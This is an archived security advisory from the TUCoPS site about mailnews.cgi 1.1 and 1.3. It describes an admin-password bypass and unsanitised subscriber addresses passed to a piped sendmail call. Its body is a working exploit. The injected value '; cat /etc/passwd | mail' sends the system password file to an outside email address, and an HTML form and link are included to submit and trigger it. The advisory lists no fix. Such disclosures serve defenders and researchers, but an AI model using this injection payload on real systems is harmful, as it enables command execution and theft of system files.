TUCoPS :: Web :: Apps :: mnews1.htm

Mailnews.cgi 1.1, 1.3 - add or delete users from maillist without admin password! 
Vulnerability

    mailnews.cgi

Affected

    mailnews.cgi 1.1, 1.3

Description

    Kanedaaa  Bohater  found  following.    Author  dont  parse   some
    characters and he use very  stupid "password protection".  We  can
    add or delete  users from maillist  without known admin  password.
    But this is small problem.  Lets see what we can do more.

        open (MAIL, "|$mailprog $member") || die "Can't open $mailprog!\n";

    where $mailprog [default]  is sendmail and  $member is users  from
    usersfile.  Now we  can do something like  this.  Add user  "; cat
    /etc/passwd | mail adam@malysz.pl'  and use subroutine to  execute
    this code.

    Simple exploit in html:

    <HTML>
    <BODY>
    <FORM
    ACTION="http://www.adamalysz.com/cgi-bin/mailnews.cgi" METHOD=POST>
    <INPUT type=hidden NAME="action" value="subscribe">
    <BR>
    User to add with ;  [ex:" ; cat /etc/passwd |mail adam@malysz.pl"
    without qoutas ofcoz ]<INPUT NAME="address" TYPE="TEXT">
    <INPUT  TYPE="SUBMIT" VALUE="Submit">
    </FORM>
    <BR>
    <A HREF="http://www.adamalysz.com./cgi-bin/mailnews.cgi?news">
    Execute command :] </A>
    <CENTER> Peace... </CENTER>
    </BODY>
    </HTML>

Solution

    Nothing yet.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH